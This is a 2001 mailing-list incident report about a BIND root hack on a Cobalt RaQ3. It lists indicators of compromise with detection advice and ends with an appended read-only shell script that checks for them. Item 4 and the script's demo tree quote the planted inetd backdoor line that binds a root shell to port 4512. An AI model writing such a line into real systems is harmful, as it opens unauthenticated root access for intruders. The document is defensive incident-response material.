[cobalt-security] February Hack Update
Lawrence Frewin of Accommodation.com Mon, 05 Mar 2001 00:46:21 -0800

We have finished checking our RAQ3 following a serious root hack in February using the Bind exploit. This is what we have found so far by comparing the hacked machine with a good machine:

1) A file called "erkms.tgz" (probably a Trojan rootkit) was found in the "/tmp" directory. The file had not been executed. A directory called "erkms" was also created, although it was empty.
Advice: run a check for the "erkms.tgz" file and directories. Also check for /dev/hdcc, /dev/hdbb and /dev/ptyq, as the presence of these may indicate that the script was at least partly executed.

2) A file called "init" was put into the "/usr/sbin" directory and a process called "init" was activated every 5 minutes by executing the init file from crontab. Two "init" processes were therefore running at the same time. The purpose of the new init process is unknown, but it may open port 681.
Advice: check for the "/usr/sbin/init" file, check your crontab entries and check what processes are running. Look for an "init" process other than that found at PID 1 using "ps -ax".

3) A file called "cronlogd" was put into the "/usr/sbin" directory and changes were made to "/etc/rc.d/rc.sysinit" to add the text "/usr/sbin/cronlogd" at the end, which launches "cronlogd" as a process. The purpose of the cronlogd process is unknown, but it may open port 32.
Advice: check for "/usr/sbin/cronlogd", check that the "/etc/rc.d/rc.sysinit" file has not been tampered with, and check what processes are running using "ps -ax".

4) Changes were made to the file "inetd.conf" and also to the file "inetd.conf.noqpopper", both found in the "/etc" directory. A new line reading "4512 stream tcp nowait root /bin/sh sh -i" was added to both files, which opens port 4512.
Advice: check what ports you have open using netstat -ap | grep "*:*". Check that both of the above files have not been tampered with.

5) We also believe part of the hack was designed to make it impossible for us to update Bind with patches from Cobalt, either through the GUI or using wget. We got stuck at version BIND-8.2.2_P7-C1 until we manually transferred a copy of named BIND-8.2.3-C1 using FTP from a good machine to get the update in place.
Advice: check you have BIND-8.2.3** or better in place using "named -v" from the command line. Anything less is an open door.

6) We have a suspect small text file called "la.pid" in both the "root" dir and the "/usr/sbin" dir. Web security pages suggest this could be an indicator of whether malicious code has been properly installed or not. It is not found on a good machine.
Advice: try a "locate la.pid" from the command line.

Any advice or updates on this last file or the other malicious files or processes is welcome. Needless to say this machine is now going offline for a full re-install.

LF

_______________________________________________
cobalt-security mailing list
[EMAIL PROTECTED]
http://list.cobalt.com/mailman/listinfo/cobalt-security
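The six checks in the post above can be collected into one read-only script. The following is an added example and not part of Lawrence's post or of any Cobalt tooling: it looks for exactly the file paths, cron entry, rc.sysinit change and inetd line the post describes, takes a filesystem root prefix so it can be run against a mounted disk image of the suspect RaQ rather than trusting binaries on a box that may already be rooted, and ends with a constructed demo tree (a fake root carrying several of the indicators) so it can be exercised offline. The function names (`scan_host`, `count_hits`, `live_checks`) and the sample inetd and crontab lines in the demo tree are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the original post): read-only check for the
# indicators listed in the February Hack Update, run against a filesystem
# root prefix ("/" for the live system, or the mount point of a disk image).
# Paths come from the post; function names and demo data are constructed.

# Print one line per indicator found under $1.
scan_host() {
  fsroot="${1%/}"        # "/" becomes "", so "$fsroot/tmp" is "/tmp"

  # 1) rootkit archive and directory, plus the device nodes the script creates
  # 2) 3) binaries dropped into /usr/sbin    6) the la.pid marker files
  for f in tmp/erkms.tgz tmp/erkms dev/hdcc dev/hdbb dev/ptyq \
           usr/sbin/init usr/sbin/cronlogd root/la.pid usr/sbin/la.pid; do
    if [ -e "$fsroot/$f" ]; then
      echo "FILE    $fsroot/$f"
    fi
  done

  # 2) cron entries that re-launch the dropped /usr/sbin/init
  for c in "$fsroot/etc/crontab" "$fsroot/var/spool/cron/root" \
           "$fsroot/var/spool/cron/crontabs/root" "$fsroot"/etc/cron.d/*; do
    if [ -f "$c" ] && grep -q '/usr/sbin/init' "$c"; then
      echo "CRON    $c"
    fi
  done

  # 3) cronlogd appended to the boot script
  if [ -f "$fsroot/etc/rc.d/rc.sysinit" ] && grep -q 'cronlogd' "$fsroot/etc/rc.d/rc.sysinit"; then
    echo "SYSINIT $fsroot/etc/rc.d/rc.sysinit"
  fi

  # 4) a service bound to port 4512 in either inetd configuration file
  for i in "$fsroot/etc/inetd.conf" "$fsroot/etc/inetd.conf.noqpopper"; do
    if [ -f "$i" ] && grep -q '^4512[[:space:]]' "$i"; then
      echo "INETD   $i"
    fi
  done
  return 0
}

# Number of indicators found under $1; 0 means nothing from the list is present.
count_hits() {
  scan_host "$1" | wc -l | tr -d ' '
}

# Live-only checks from the post (second init process, listening ports);
# these look at the running system, so they only make sense with root "/".
live_checks() {
  ps -eo pid,comm | awk '$2 == "init" && $1 != 1 { print "PROC    init at pid " $1 }'
  netstat -an 2>/dev/null | grep -E ':(4512|681|32) ' | sed 's/^/SOCKET  /'
  return 0
}

# --- constructed demo tree: a fake RaQ root with several of the indicators ---
demo_root=$(mktemp -d)
clean_root=$(mktemp -d)
trap 'rm -rf "$demo_root" "$clean_root"' EXIT
mkdir -p "$demo_root/tmp" "$demo_root/usr/sbin" "$demo_root/etc/rc.d" "$demo_root/root"
: > "$demo_root/tmp/erkms.tgz"
: > "$demo_root/usr/sbin/cronlogd"
: > "$demo_root/root/la.pid"
printf '*/5 * * * * root /usr/sbin/init\n' > "$demo_root/etc/crontab"
printf '# end of rc.sysinit\n/usr/sbin/cronlogd\n' > "$demo_root/etc/rc.d/rc.sysinit"
printf 'ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd\n4512 stream tcp nowait root /bin/sh sh -i\n' \
  > "$demo_root/etc/inetd.conf"

scan_host "$demo_root"      # prints six indicator lines for the demo tree
echo "hits: $(count_hits "$demo_root") (demo), $(count_hits "$clean_root") (clean)"
```

Point `scan_host` at the mount point of the suspect disk (for example `scan_host /mnt/raq`) and it never executes anything from that filesystem; `live_checks` is the only part that trusts the running host, which matches the post's own advice that the compromised machine should be taken offline and rebuilt rather than cleaned in place.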